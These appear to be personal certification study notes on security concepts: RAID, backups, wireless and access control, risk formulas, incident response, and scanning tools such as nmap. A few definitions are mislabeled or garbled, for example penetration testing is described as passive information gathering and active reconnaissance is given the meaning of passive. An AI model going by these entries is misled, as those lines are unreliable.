Memorandum of Understanding (MOU) is an agreement between two or more parties, outlining their intentions to work together on a project or in a partnership. I
Product development plans should be classified as proprietary data. 

Infrastructure as Code (IaC) is the management of infrastructure (networks, virtual machines, load balancers, and connection topology) in a descriptive model, using code rather than manual processes.
Implementing version control and conducting regular code reviews is most critical for ensuring security of infrastructure
Privilege Creep refers to the gradual accumulation of access rights by employees beyond what is necessary for their job functions.





17. Resilience & Recovery


RAID 0
Requires a minimum of 2 drives to implement
Is also known as disk striping
Decreases reliability (failure of any disk in the array results in the loss of all data in the array)
Is suitable for systems where performance has higher priority than fault tolerance


RAID 1
Requires at least 2 drives to implement
Offers improved reliability by creating identical data sets on each drive (failure of one drive does not destroy the array as each drive contains identical copy of the data)
Is also referred to as disk mirroring


RAID 5
Requires at least 3 drives to implement
Offers increased performance and fault tolerance (single drive failure does not destroy the array and lost data can be re-created by the remaining drives)
Is also known as disk striping with parity


RAID 6
Requires at least 4 drives to implement
Offers increased performance and fault tolerance (failure of up to 2 drives does not destroy the array and lost data can be re-created by the remaining drives)
Is also known as disk striping with double parity


RAID 10
Requires a minimum of 4 drives to implement
Is referred to as stripe of mirrors, i.e., a combination of RAID 1 (disk mirroring) and RAID 0 (disk striping)
Offers increased performance and fault tolerance (failure of one drive in each mirrored pair of disk drives does not destroy the array)


Only RAID 0 offers not fault tolerance
Load balancing distributes workload across multiple servers for better performance
Primary reason why we cluster is to provide high availability and fault tolerance


Hot site is a fully operational duplicate of the original site
Warm site that has some pre-installed hardware and network configurations, but it requires additional setup before becoming fully operational
cold site provides only the physical space, such as power, cooling, and networking, but lacks the necessary hardware, software, and data.

Continuity of Operations plan
Tabletop exercise = hypothetical conducted in a controlled environment
walk-through is a method where team members discuss and review each step of an emergency response plan in a meeting setting, focusing on verbal discussion without physical enactment or simulation.

Fail over = switching to redudant system when the original has failed.
Simulation = semi real incident used to assess dectection response.
Parallel processing = provides redundancy + fault tolerance by dividing tasks into smaller subtasks and distributing across multiple systems to be executed simultaneously
snapshot = file-based representation of the state of a vitual machine  (let's you revert to this state later if you want too)
snapshot backups = commonly used with virtual machines
Differential Backup copies all the data that has changed since the last full backup. While it requires more storage space than an incremental backup, it simplifies the restore process as it only needs the last full backup and the last differential backup to restore the system.
 Incremental Backup: This method only backs up data that has changed since the last backup of any type (full or incremental), using less storage space but potentially leading to a longer restore process
replication = create real-time backups on another system
journaling = allows you to recover chagnes made since last backup
Power distribution unit (PDU) = is a device to supply and monitor the quality of electric power to multiple outlets  (used in data centers)
Uninterruptible power supply (UPS) = provides short-term emergency power during an unexpected main power outtage.  devices can continue operating for a limited time so that they can have a normal shutdown


BIA (Business Impact Analysis) = assesses potential impact of incidents on critical functions/operations
identify and prioritize essential systems and workflows necessary for patient care continuity after a disruption.


18. Wireless Security Settings

primary function of a network switch in a LAN environment = connect devices within a network and manage data traffic based on MAC addresses
An air gap in cybersecurity means physically separating a computer or network from external networks, like the internet.

You should change default configs with devices from the manufacture (best practice)
PINs are used in bluetooth device pairings
WPA3-SAE (Simultaneous Authentication of Equals) offers the strongest security for a small network that lacks an authentication server
802.1X is a network access control protocol that, when used in conjunction with WPA3, provides a robust security framework for Wi-Fi networks.
IEEE 802.1X is a network security protocol that offers a method for authenticating and controlling user access to networked systems, particularly in Ethernet networks


TGT (Ticket-Granting Ticket).
In a Kerberos-protected network, the TGT is the secure token granted to users during their initial login.


host-based firewall allows for the regulation of incoming and outgoing network traffic on individual computers with specific configuration for each
Network-based firewall: Controls traffic at the network perimeter, not on individual systems.

WPA2/WPA3 Enterprise mode are:
Suitable for large corporate networks
IEEE 802.1X
Requires RADIUS authentication server

AES-GCMP = The encryption protocol primarily used in Wi-Fi networks implementing the WPA3 security standard 

Signature-based HIDS operates by using a database of known threat signatures or attack patterns to detect intrusions
Network-based: This refers to intrusion detection systems that monitor network traffic
Heuristic-based: Heuristic-based detection uses behavioral patterns to identify potential threats
Anomaly-based: Anomaly-based detection identifies unusual activities or deviations from normal behavior


screened subnet, also known as a demilitarized zone (DMZ), is the best choice for placing a web server that interacts with external users

Data Link Layer 2 = Facilitating data transfer between network devices
Providing end-to-end communication: This is the role of the Transport Layer (Layer 4).
Routing data across multiple networks: This is the function of the Network Layer (Layer 3).
Managing the physical connection between devices: The Physical Layer (Layer 1)

route command =  To view and manipulate the routing table
jump server = provide a secure intermediary for accessing devices across different security zones
microservice architecture in application development = Applications are constructed as a collection of loosely coupled services using lightweight protocols
SaaS (Software as a Service) model, the cloud provider manages all aspects of the infrastructure, platform, and software
PaaS (Platform as a Service): While Platform as a Service reduces some responsibilities, it still requires the IT department to manage the applications running on the platform
IaaS (Infrastructure as a Service): Infrastructure as a Service offers more control but also more responsibility in managing the operating systems, storage, and deployed applications.

RADIUS are:
Primarily used for network access
Combines authentication and authorization
Encrypts only the password in the access-request packet


EAP is primarily used in network security as a framework for various authentication mechanisms
It allows two systems to authenticate each other and to establish a secure encryption key for data transmission, which is essential in environments like wireless networks.


LEAP (lightweight extensible authentication protocol) = now deprecated, wireless auth protocol by Cisco  (EAP TTLS or EAP-TLS are recommended)
PEAP (Protected Extensible authentication protocol) = open standard wireless network auth that encapsulates auth process in encrypted TLS tunnel
if you were going to upgrade you would do it with PEAP


OAuth (Open Authorization) is a widely used authentication framework that allows users to log in to third-party applications 
using their existing social media or other service provider accounts without sharing their passwords

SAML is a widely used Single Sign-On (SSO) protocol designed for enterprise environments.
allows employees to log in once and gain access to multiple cloud-based and internal applications without needing to re-authenticate for each service.

Secure Web Gateway (SWG) is the most effective solution for managing and ensuring safe internet usage in an enterprise.
 logic bomb, a type of malicious code that is triggered by a specific event or condition
Logic bombs are dormant until their conditions are met, at which point they execute their malicious payload, which can range from data corruption to system disruption.

Clickjacking is a deceptive technique where attackers overlay a transparent, clickable layer over what appears to be a legitimate part of a webpage.




19. Application Security

Critical to secure app developemnt: 
Input validation   (e.g. web form field accepting data from server commands)  
error and exception handling

Input validation helps protect against SQL injection, command injection, and cross-site scripting (XSS)
input validation and encoding are countermeasures to XSS
secure cookie  = type of http cookie that is enrypted over HTTPS that prevents it from being intercepted/tampered during transit
static code analysis = manual review of code to dectect logic/syntax errors.   you are not running the code to see errors (i.e. it's static)

dynamic code analysis = requires actual execution of the code to identify flaws
key practice in software security testing, where the analyst runs the application in a live environment to identify potential vulnerabilities and operational defects

Input validation is a crucial security measure for web applications!!

code signing purpose:
confirm apps source of origin  
validates apps integrity

Fuzzing = Security technique that invovles testing an app by feeding it incorrect input
Sandboxing = running code in an isolated manner to test how it affects the system.  used in malware analysis, browser security.
Structured Exception Handling (SEH) = a Windows feature  for handling execptions, errors and abnormal conditions in software


Address Space Layout Randomization (ASLR) = randomizes the location of key data in areas of memory. defense against memory based attacks like buffer overflows
CAPTCHA is used a countermeasure againts automated software like network bots.

collision attack occurs when different data sets result in the same hash output, undermining the hash function‘s integrity.
Replay Attack: Consists of reusing valid data transmission
Injection Attack: Involves inserting harmful code into a system



20. Vulnerability Management


vulnerability scanning:
Identifies lack of security controls
Identifies common misconfigurations
Passively tests security controls

Features of Static Code Analysis:
Involves examining the code without executing it
Often used early in the development process
Examines code structure, syntax, and semantics to detect issues like syntax errors, coding standards violations, security vulnerabilities, and bugs

Features of Dynamic Code Analysis:
Typically used later in the software development lifecycle
Analyzes runtime properties like memory usage, performance, and error handling to identify issues such as memory leaks, performance bottlenecks, and runtime errors
Involves executing the code and analyzing its behavior at runtime

Package monitoring = tacking and managing software app components such as 3rd party libraries and other dependencies
Open Source Intelligence (OSINT) = threat intelligence from public data sources; practice of gathering and analyzing information from publicly available sources to assess cyber threats and vulnerabilities.

Automated Indicator SHaring (AIS) = us gov initiative for real-time sharing of cyber threat indicators


Structured threat informaiton expression (STIX) = common language for describing cyber threat information
Trusted Automated eXchange of Indicator Information (TAXII) = transport mechanism for cyber threat information (it's designed for sharing cyber intel in combo with STIX)

Tactics, Techniques, and procedures (TTP) = insignts into the methods and tools used by cybercriminals to carry out attacks

Policy: High-level documents outlining the organization‘s overall stance and approach to cybersecurity.
Standard: Specific, often technical requirement for how something should be done or built.
Guideline: Recommendations or best practices for various cybersecurity activities.
Procedure: offer detailed, actionable instructions for completing specific tasks within an organization‘s cybersecurity framework

Due Care in the context of cybersecurity refers to the ongoing commitment and effort to maintain a secure environment.

Penetration testing:
Bypasses security controls
Actively tests security controls
Exploidts vulnerabilities


Responsible disclosure program encourages: security research, ethical hackers, report vulnerabilies, and bug bounty program ($$ for finding valid vulnerabilies)

False positive error = antivirus software identifyig non-malicious file as a virus due to faulty virus signature
 a false positive occurs when legitimate traffic is incorrectly identified as an attack or malicious activity


False negative = situation where an attack occured but no alarm or alert is raised i.e. undectected attack.

FRR (false rejection rate) = measures the likelihood that a security system will incorrectly reject an acess attpempt by an authroised user
ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) =  framework that provides a detailed understanding of the tactics, techniques, and procedures (TTPs) used by adversaries during cyberattacks.
CVSS (Common Vulnerability Scoring System) = ndustry standard used for assessing and scoring the severity of computer system security vulnerabilities, providing a way to evaluate their impact based on factors like exploitability and potential damage.
CVE (Common Vulnerabilities and Exposures) =  refers to a system that identifies, defines, and catalogs publicly known cybersecurity vulnerabilities.


fail-closed system is one that, in the event of a failure, restricts access rather than allowing unrestricted entry
 This approach prioritizes security over accessibility, ensuring that no unauthorized access occurs during system errors.


EF (exposure factor) = degree of loss that a realized threat would have on a specific assets


Examples of vulnerability response and remediation techniques:
Applying updates or fixes provided by software vendors to address the vulnerability (patching)
Ensuring financial recovery from the costs associated with a successful cyberattack (insurance) 
Dividing a network into smaller, isolated zones to limit the potential impact of a vulnerability (segmentation)
Mitigating the risk associated with a vulnerability that cannot be immediately patched by implementing alternative security measures (compensating controls)
Delaying or forgoing a patch for a specific system, e.g., when applying a patch may not be feasible due to compatibility issues or potential disruptions to critical systems (exceptions and exemptions)





21. Secure Network Protocols


HTTPS = secure webrowsing
Secure file transfer are = FTPS (FTP secure) and SFTP (ssh FTP)
FTPS = runs on TCP port 990 (implicit)  or TCP port 21 (explicit).  Uses SSL/TLS to secure the connection.  SFTP uses ssh protocol
FTP on port 21 is typically not secure.

SMTPS is deprecated, used for emails, now we use SMTP with STARTTLS
IMAPS and POP3S = allow for secure retrieval of emails from a mail server to an email client by encrypting the communication using SSL/TLS
SRTP (secure real-time transport protocol) = SRTP is used to provide encryption, authentication and integrity for real time multimedia communciation like video/audio calls over ip networks




22. Access Controls


Zero-trust security
    control plane is responsible for defining and managing the security policies
    data plane = responsible for enforcing these security policies (handles actual authentication + access control decisions)
components of Policy decision point (PDP): policy engine (PE) and Policy Administrator (PA)
policy enforcement point (PEP) enforces the control plane by the policy decision point (PDP)
** Always verify and never trust, regardless of location within or outside the network.**

Mandatory Access Control (MAC):
Users are not allowed to change access policies at their own discretion
Labels and clearance levels can only be applied and changed by an administrator
Every resource has a sensitivity label matching a clearance level assigned to a user
(MAC is the strictest set of access rules)

RuBAC = allows for defining granular rules that consider user roles, time constraints, and network access restrictions

Discretionary Access Control (DAC): access control model based on user identity.
RBAC (Role-Based Access Control) = user permissions are based on their specific roles and responsibilities within an organization. (predefined rules)

ABAC (attribute-based access control) = access control decisions are made based on a variety of attributes (such as user roles, time, location, network access, and more)  This is the most human readable!!
Properties of ABAC
Subject (i.e., user or process requesting access)
Type of action (for example "read", "write", "execute")
Resource type (medical record, bank account etc.)
Environment (contextual data, such as time of day or geolocation)

Metadata embedded within files can reveal crucial details like file creation and modification dates, authorship, file size, and format.


time-of-day restrictions would be the most suitable for scheduling system maintenance task during periods of low user activity

principle of least privilege is a security rule that prevents users from accessing information and resources that lie beyond the scope of their responsibilities.

Non-repudiation = ensures that an entity cannot deny the authenticity of a transaction or communication. e.g. digital signatures, hashing, digital certs.

COPE (Corporate-Owned, Personally-Enabled) policy example:
the company provides mobile devices to employees, retaining ownership and control over the devices, while allowing employees to use them for limited personal purposes.
CYOD (Choose Your Own Device)  = employee chooses and employer buys it.
Change Management Policy is crucial in ensuring that all modifications to IT systems, applications, and critical infrastructure components are made in a controlled, documented, and coordinated manner


Fuzz testing involves providing random, unexpected, or invalid data as input to a program to identify vulnerabilities or flaws in its behavior. 


23. Password Concepts

Max password age policy is the most effective in decreasing the risk of a security breach

Can be used as passowrdless auth: biometrics, hardware towkens, qr codes, otps, passkeys 
data masking = Replacing password characters in a password field with a series of asterisks
Salt = random data added to a password before hashing.  countermeasure against brute-force, dictionary, and rainbow table attacks
"Pass the hash" attack, an attacker uses a hashed version of the password (instead of the cleartext password) to authenticate to a remote server.
spraying attack involves trying a small set of commonly used passwords (often very simple or popular ones) against a large number of user accounts. it bypasses account-lockout policies

 Hardware Security Module (HSM) primary function in a network security environment: generate and store RSA encryption keys, providing hardware-based encryption

Rainbow Table Attack. This type of attack uses precomputed tables (Rainbow Tables) to quickly match cryptographic hashes to their plaintext equivalents



24. Incident Response Activities


Preparation stage
phase involves establishing and maintaining the incident response capability, 
setting up an incident response team, developing incident response plans, and 
preparing necessary tools and resources to respond to security incidents effectively.


Detection and analysis stage
involves identifying and understanding potential incidents to determine their scope, impact, and root cause


Containment, eradication, and recovery stage
Restoring normal operations
Eliminating the threat
Mitigating the impact of the incident


Post-incident activity stage
involves updating incident response plans, policies, and procedures


Threat hunting is actively search for indicators of compromise (IoCs) before they evolve into more serious incidents


chain of custody refers to the documented process that tracks the handling, movement, and storage of evidence to ensure its integrity and admissibility in court.
(basically evidence isn't tampered with) 

E-discovery (electronic discovery) refers to the process of identifying, collecting, and producing electronically stored information (ESI) 
for use in legal proceedings or investigations.
process of identifying, collecting, and producing electronically stored information in response to a request in legal cases




25. Risk Management Concepts

Risk = the likelihood or probability that a threat could exploit a vulnerability in a system, potentially leading to negative consequences for an organization
Threat example: receiving a phishing email claiming to be from a vendor
risk is generally calculated by multiplying the severity of the impact of a potential breach or exploit by the likelihood of that exploit occurring

risk assessment = process of determining potential risks that could affect an organization's ability to achieve its objectives
risk analysis = The process of evaluating discovered risks to understand their potential impact and likelihood 
Ad hoc =  risk assessment method based on need, typically conducted in response to specific events or changes, such as after a major organizational change or a security breach
Quarterly or annual risk assessments  are an example of recurring risk assesstment
One-time risk assesstment = has a specific purpose i.e. for a new product lauch
Real-time monitoring of network security threats is an example of continous risk assessment


Common vulnerability scoring system (CVSS) = numerical score to assess the severity of known vulnerabilities


Qualitative risk assessment = is based on subjective judgment and focuses on the likelihood and impact of risks, 
often using descriptive terms like "high," "medium," and "low" rather than numerical values.

Single loss expectancy (SLE) = involves numerical values to estimate the potential financial impact of a risk.  Example of quatitative risk assessement
formula = SLE = AV × EF  ( Asset Value (AV) by the Exposure Factor (EF) )

ALE (Annual Loss Expectancy) = estimated yearly financial loss due to a specific risk, calculated by multiplying the Single Loss Expectancy (SLE) by the Annual Rate of Occurrence (ARO).

Annual Rate of Occurrence (ARO) = It quantifies the likelihood of an event happening in a year.
Mean Time Between Failures (MTBF): MTBF is a measure of the reliability of a system or component and is not directly applicable to forecasting the frequency of cybersecurity incidents.

SLE=Asset Value (AV)×Exposure Factor (EF)

Risk register = omprehensive document used in risk management and project management to identify, assess, and track risks
Risk tolerance = refers to specific level of risk an org is willing to accept to accomplish goals
Risk appetite = general term that describes an organization’s overall attitude towards risk-taking
Residual Risk Residual Risk refers to the level of risk that remains in an organization after all risk controls and mitigation strategies have been implemented.


example of Risk transference:   Contracting out a specialized technical component when the company's employees lack the necessary skill
example of cyber insurance:   Cybersecurity insurance transfers the financial risk of a cyber incident to the insurance company, meaning the organization is shifting the burden of potential financial loss to another party.

Exemption =  choosing not to apply certain controls or safeguards for a specific risk
Execption = the practice of temporarily not complying with a standard or policy due to a specific risk scenario

risk avoidance = for example, disabling certain system functions or shutting down the system when risks are identified
risk mitigation = the process of taking proactive measures to reduce the impact of identified risks
example:  identifying a software flaw, a company immediately works on a fix

By standardizing data formats and communication methods, SCAP enhances the ability of these tools to work together effectively


Recovery time objective (RTO) = maximum allowable time to restore critical business functions after a disruption
Recovery point objective (RPO) = maximum acceptable amount of data loss measured by a specific point in time before a disaster or outage
MTTR (Mean Time to Repair) = is used to describe the average time required to repair a failed component or device
high MTBF (Mean Time Between Failures) value indicates that a component or system provides high reliability and is less likely to fail
MTTF (mean time to failure) = metric that represents the average amount of time a device or system is expected to operate before experiencing its first failure 


Backout plan = A backout plan is essential for safely reversing changes that do not work as expected, ensuring minimal impact on system operations.

Secure Access Service Edge (SASE) = cybersecurity frameworks is best suited for integrating networking and security services into a single, cloud-based platform to support the evolving secure access needs of organizations
SASE architecture encompasses key functions like SD-WAN, Firewall-as-a-Service (FWaaS), and Zero-Trust Network Access

Containerization is the most suitable technology for isolating critical applications within a shared physical server environment.

OWASP (Open Web Application Security Project) = most beneficial resource for software developers looking to improve secure coding practices in web applications

EOSL (End of Service Life) is the term used to describe the final stage in a product‘s lifecycle, particularly in the context of software and hardware. 
TCO (Total Cost of Ownership) = total cost of owning a product or system over its entire lifecycle, including acquisition, operation, and maintenance costs.

Risk register = To list known risks, their owners, risk scores, and recommended security controls for risk mitigation.


footprinting / fingerprinting = To identify specific services and their versions running on individual systems.
persistence = ability of an attacker to maintain access within a network over an extended period without detection.
“Impossible Travel Time“ policy is designed to detect and prevent situations where a single account is used to log in from geographically distant locations within a timeframe that is impossible by normal travel means.
Threat Likelihood is the most relevant metric for estimating the probability of malware attacks continuing at the same rate in the future. 
System log in the Windows Event Viewer is the primary log for tracking events that are directly related to the functioning of the Windows operating system
The most critical immediate action following the identification of a potential data breach is to enforce a legal hold
Elliptic Curve Cryptography (ECC) is known for providing high levels of security with relatively smaller key sizes compared to traditional methods like RSA
SAML (Security Assertion Markup Language) is used in federated identity management systems primarily to enable user authentication and identity sharing between different organizations.


how does separating the control plane from the data plane contribute to overall network security?
It limits the risk of network reconfiguration by attackers by isolating the management of the network from user data traffic.





26. Agreement Types


SLA (service level agreement) = an agreement that specifies performance requirements for a vendor

MSA (Master Service Agreement) = formal and often legally binding document that outlines specific responsibilities, roles, and terms agreed upon by two or more parties

MOU (Memorandum of Understanding) = nonbinding agreement that outlines the mutual goals and general framework for cooperation between two or more parties

Work Order (WO) is a document that authorizes, initiates, and tracks the progress and completion of a particular job or task. 

Statement of Work (SOW) is a detailed agreement between a client and a vendor that describes the specific work to be performed on a project.

NDA (Non-Disclosure Agreement) is a legal contract that restricts the person receiving confidential information from disclosing it to others. 

BPA (Business Partnership Agreement) is a formal contract between business partners outlining their rights, responsibilities, and obligations, 
including details about the management, operation, and decision-making processes within the business.


MSSP (Managed Security Service Provider) specifically denotes a company that focuses on providing services related to the management and monitoring of security aspects in IT and network systems. 

27. Penetration Testing

Penetration testing:
Bypasses security controls
Actively tests security controls
Exploits vulnerabilities


red team = attacker
blue team = defender
White team = overseer
purple team = combo of both red/blue

white-box = A penetration test performed by an authorized professional with the full prior knowledge on how the system that is to be tested works
grey-box = A penetration test in which the person conducting the test has limited access to information on the internal workings of the targeted system
black-box = A penetration test of a computer system performed without prior knowledge of how the system that is to be tested works 

Penetration testing = involves gathering any type of publicly available information that can be used later for exploiting vulnerabilities found in the targeted system
Active reconnaissance = passive reconnaissance relies on gathering information on the targeted system with the use of various non-invasive software tools and techniques, such as pinging, port scanning, or OS fingerprinting



28. Blockchain

how does blockchain technology ensure the integrity and security of transactions: By storing each transaction in an immutable chain of blocks, where each block is linked to the previous one through a unique hash
Blockchain is best defined as a distributed and decentralized public ledger technology





29. Linux

netstat -an = command is used to display all active connections and listening ports on a server
Nmap's -O (OS detection) flag allows the analyst to determine the operating system of a remote host by analyzing TCP/IP stack responses. This is the most effective tool for OS fingerprinting.

ping 10.10.10.1: Ping is used to test the reachability of a host on an IP network and does not provide information about active connections or listening ports.
nmap -sV 10.10.10.1: While Nmap is used for network scanning and security auditing, the ‘-sV‘ option is specifically for service version detection and not for reviewing all active connections.
tracert 10.10.10.1: Traceroute is used to trace the path packets take to a network host, but it does not show active connections or listening ports.

/etc/shadow file in Linux systems contains the encrypted passwords for user accounts, along with other information related to account expiration and password aging
/etc/passwd is readable by all users and contains user account information without encrypted passwords.


SELinux uses the Mandatory Access Control (MAC) scheme which is more rigid compared to DAC (used in windows)
Uses labels and contexts to control access based on predefined rules
prevents unauthorized access even if you are root

nmap -sV example.com  = designed to perform service version detection, allowing the company to identify what versions of software are running on its web application‘s server
Nmap is a network scanning tool used for discovering devices and services on a network, including open ports, but it does not provide in-depth vulnerability assessments.

Syslog is a standard logging facility on Linux that captures log messages from various sources and stores them, providing a centralized place for reviewing system events

NTP (Network Time Protocol) is critical in the context of SIEM systems for synchronizing the time across various devices and systems within a network.
this is essential for SIEM to work correctly.

curl is the ideal tool for checking HTTP connectivity to a server. 
ping can verify basic network connectivity to the server, it does not specifically test HTTP services.

Tcpdump is a packet analyzer useful for capturing and analyzing network traffic but does not assess patch levels or specific software vulnerabilities.


30. Tools 


Wireshark is the ideal tool for analyzing “network_traffic_capture.pcap a packet capture file  (it has powerful network analysis capabilities)
network protocol analyzer, primarily used for network troubleshooting, analysis, and communication protocol development,
Wireshark is a network protocol analyzer that enables capturing and interactive display of real-time network traffic. 

Nmap: While useful for scanning the network to discover hosts and services, Nmap does not provide real-time traffic analysis.
Netcat: A versatile networking utility for reading and writing data across network connections, but not specialized for traffic analysis.
Traceroute: Useful for displaying the route and measuring transit delays of packets, but not for in-depth traffic analysis.


Snort is primarily a network intrusion detection system (IDS) and intrusion prevention system (IPS), not specifically tailored for analyzing pcap files.
FTK Imager specializes in digital forensics for imaging and data recovery, not in the analysis of network packet data.

Nessus is a vulnerability scanning tool used for identifying vulnerabilities in networks and systems, but it does not analyze packet capture files.
vulnerability scanning tool that is specifically designed to assess servers for security weaknesses, including outdated patches and known vulnerabilities

Shodan primarily employs passive reconnaissance methods for gathering its data. 
It collects and indexes publicly accessible information on the internet, such as banners and metadata from servers and devices


CVE (Common Vulnerabilities and Exposures) = provides a standardized list of identified information security vulnerabilities and exposures

WPS is vulnerable to brute-force attacks that attempt different PINs until successful, allowing tools like Reaver to discover the PIN within hours.



31. Miscellanous

PSK (Pre-Shared Key) is a shared secret authentication method used in WPA (Wi-Fi Protected Access) and WPA2 for home and small business networks.
 IKE (Internet Key Exchange) is a protocol used in IPsec VPNs to establish secure connections and exchange cryptographic keys.

EAP-TLS requires certificates on both the 802.1X server and the client devices
Cloud Access Security Broker (CASB) is the ideal solution for improving security across different cloud services.

If you have a Bring Your Own Device (BYOD) policy then you want:
implementing a Mobile Device Management (MDM) solution to remotely wipe data and enforce security policies.

use of the Digital Signature Algorithm (DSA) in sending a sensitive email ensures the aspect of non-repudiation
The RA assists in the registration process but does not issue certificates
a ‘Threat‘ is any potential danger or event that can compromise the confidentiality, integrity, or availability of data or systems
 Vulnerability is a weakness or gap in a system‘s design, implementation, or operation that could be exploited by a threat, not the danger itself.
Risk is the potential for damage or loss resulting from a threat exploiting a vulnerability.
A breach is an incident where security has been bypassed or violated, which is the consequence of a threat exploiting a vulnerability, rather than the potential danger itself.
Security awareness training is a crucial administrative control for reducing the risk of social engineering attacks.

SYN Flood Attack, where numerous SYN requests are sent to the target server but are not proceeded to the next step of the TCP three-way handshake (the server‘s SYN-ACK response and the client‘s ACK response)
after an application undergoes an update or modification, an application restart might be necessary to apply the changes.
third-party certificate is issued by a trusted third-party Certificate Authority and not by the entity itself.
Impact analysis is an essential component of the Change Management Process. 
Key exchange refers to the methods and protocols used to securely share cryptographic keys between parties,
The Secure Enclave is often embedded in modern smartphones and tablets. It provides a secure environment for sensitive operations, such as mobile payments,
Key escrow systems, due to their centralized storage of cryptographic keys, might become attractive targets for attackers
Diagrams provide a visual representation of an organization‘s IT infrastructure. When a significant change occurs, updating diagrams first ensures that team members have a clear and updated visual understanding of the current state.
Online Certificate Status Protocol (OCSP) is a protocol used to obtain the revocation status of a digital certificate in real-time
Hardware Security Module (HSM) offers high-performance cryptographic processing, making it suitable for organizations that handle high volumes of cryptographic operations
Hardware Security Module (HSM) is often integrated into servers, especially in data centers, to provide a secure foundation for cryptographic operations.
Record encryption targets individual data entries or rows within a database
Public key infrastructure (PKI) is a framework used to manage digital certificates and public-key encryption
A wildcard certificate is designed to secure multiple subdomains under a single domain name.
asymmetric encryption, the public key is used to encrypt data.
Ultrasonic sensors work by emitting sound waves at frequencies typically beyond human hearing. By measuring the change in the returned wave, the sensor can detect motion.
A self-signed certificate is issued and signed by the same entity, not by a trusted Certificate Authority (CA)

Digital signatures provide a cryptographic proof of the origin and integrity of digital data.
Downtime refers to the period when a system, service, or application is unavailable.
Physical controls are measures taken to protect tangible assets, including people, buildings, and systems. 
Managerial controls, also known as administrative controls, involve the establishment and maintenance of an organization‘s security framework
Detective controls are designed to identify and react to security incidents as they occur; rovides a warning or indication of violations
A hardware security module (HSM) is a physical device that provides a secure environment for storing and managing digital cryptographic keys, including those used in digital certificates. 
Deception and disruption technology aims to mislead attackers, diverting them from actual targets and wasting their resources.
Directive controls are controls that mandate specific actions or behaviors.
implementing strong encryption, an organization is upholding the confidentiality principle of the CIA Triad
Availability ensures that data and systems are accessible to authorized users when they need them.
honeynet is a network of honeypots that simulates a larger network environment
Deterrent controls are designed to discourage potential attackers by increasing the perceived difficulty or risk of attacking
ownership, often represented by change owners or managers, is responsible for ensuring that a proposed change aligns with business objectives. 
CIA Triad stands for Confidentiality, Integrity, and Availability

Data masking is the process of obfuscating specific data within a database, making it inaccessible for unauthorized users
This is especially useful in test environments where real data is needed but without the associated risks.


 primary outcome of a Gap Analysis in security is a comprehensive report that identifies vulnerabilities, weaknesses, and discrepancies in the current security posture
access control, the Subject (or System) is the entity that requests access to a resource.
 
Change Management Process is a systematic approach to handling changes in IT infrastructure. 
It considers both existing configurations and desired outcomes, ensuring that changes are implemented smoothly and without unintended disruptions
Partition encryption targets specific segments or sections (partitions) of a storage medium.

Microwave sensors emit microwave radiation patterns. 


Key stretching involves deliberately slowing down the hashing process. This makes brute-force attacks more time-consuming and less feasible, enhancing the security of hashed passwords.
Restricted activities refer to specific actions or tasks that are limited or prohibited within a system, network, or organization
Control Plane in network architecture is responsible for determining how data packets should be routed or forwarded
Two-factor authentication (2FA) requires users to provide two distinct forms of identification
self-signed certificate is issued and signed by the same entity, not by a trusted Certificate Authority. 
Salting ensures that even if two users have the same password, their hashed passwords will be different.
approval process involves obtaining formal consent from the relevant authorities or stakeholders before proceeding with a proposed change.
 initial step in obtaining a digital certificate from a Certificate Authority is the Certificate Signing Request (CSR) generation
Authentication is the process of verifying the identity of a user or system
hardware security module (HSM) is a cryptographic device that provides a secure environment for generating, storing, and managing cryptographic keys
Corrective controls are reactive measures taken after a security incident has occurred.
Policy-driven Access Control determines access rights based on predefined policies

Steganography is the practice of hiding information within other non-secret data or media, such as images or audio files.
its primary purpose is to conceal the existence of the hidden information, not to facilitate key exchange.

Secure Enclave provides a hardware-isolated environment in modern computing devices. It is designed to handle sensitive operations, such as biometric data processing, securely and separately from the main processor.
Certificate Authority (CA) is responsible for issuing and verifying digital certificates
online Certificate Status Protocol (OCSP) is used to check the revocation status of a digital certificate in real-time. 
Key escrow refers to a system where third-party entities hold cryptographic keys. 
Hardware Security Module (HSM) is a physical device specifically designed to manage, process, and store cryptographic keys securely outside of the host‘s environment
root of trust serves as a foundational element in a security system, representing a trusted entity that verifies the linkage between a public key and its owner
security policy or framework outlines the organization‘s desired security standards, practices, and controls. 
Algorithms refer to the mathematical processes used in encryption to transform plaintext data into encrypted ciphertext.
honeypot is a decoy system designed to appear vulnerable to attackers. Its primary purpose is to attract and divert attackers from real systems, allowing organizations to study their tactics and gather intelligence.
 honeytoken can be embedded within a database or other data repositories. If the honeytoken is queried or accessed, it indicates potential unauthorized activity, as the token serves no real purpose other than detection.

Trusted Platform Module (TPM) can be used to enhance the security of software-based encryption by providing a hardware-based root of trust.
It ensures that cryptographic operations are anchored in hardware, making them more resistant to software-based attacks.
maintenance window is a predefined time period during which changes, updates, or maintenance activities can be carried out with minimal disruption to business operations. 
maintenance window is a predefined time period during which changes, updates, or maintenance activities can be carried out with minimal disruption to business operations. 

After applying a patch or update to a service, a service restart is often required to apply the changes
Periodic Gap Analyses ensure that organizations remain compliant with these standards, adapt to new threats, and maintain a robust security posture.
Test results provide evidence of the success of a change implementation. 
Data masking does not permanently alter the original data
Impact analysis involves assessing the potential consequences and effects of a proposed change on various aspects of the organization, including operations, finances, stakeholders, and more.
Policy Enforcement Point (PEP) is responsible for enforcing security policies in a system or network.
Adaptive Identity adjusts authentication requirements based on various factors, such as user behavior, device, location, and context.
Biometric access controls, such as fingerprint or retina scanners, are physical measures designed to prevent unauthorized physical access to a facility or specific area within a facility.
Policy Administrator is responsible for defining, managing, and updating security policies within an organization‘s security infrastructure
key length, often measured in bits, determines the strength and security of an encryption algorithm.
Key Management System ensures that cryptographic keys are available to authorized users when needed.
Tokenization is the process of replacing sensitive data with non-sensitive tokens or placeholders.
Blockchain is the technology that underpins cryptocurrencies. It serves as a decentralized database of transactions, ensuring transparency and security.
Threat Scope Reduction involves narrowing down or minimizing the potential attack vectors.
Policy Engine evaluates and makes decisions based on predefined security policies.
Digital certificates are a form of “something you have“ authentication. They are digital documents that a system can present as proof of its identity, and they are typically issued by a trusted Certificate Authority (CA).
Key Management System is primarily responsible for the centralized management of cryptographic keys throughout their lifecycle. It handles key generation, distribution, storage, rotation, and deletion.
Data Plane, also known as the forwarding plane, is responsible for the actual forwarding or transmission of data packets in network architecture.
Key escrow refers to the process where a trusted third party holds a copy of the encryption key.
Transport/communication encryption is used to secure data during its transmission over networks. 
Biometric systems authenticate individuals based on their unique physical or behavioral characteristics. Fingerprint or retina scans are examples of “something you are“ authentication.
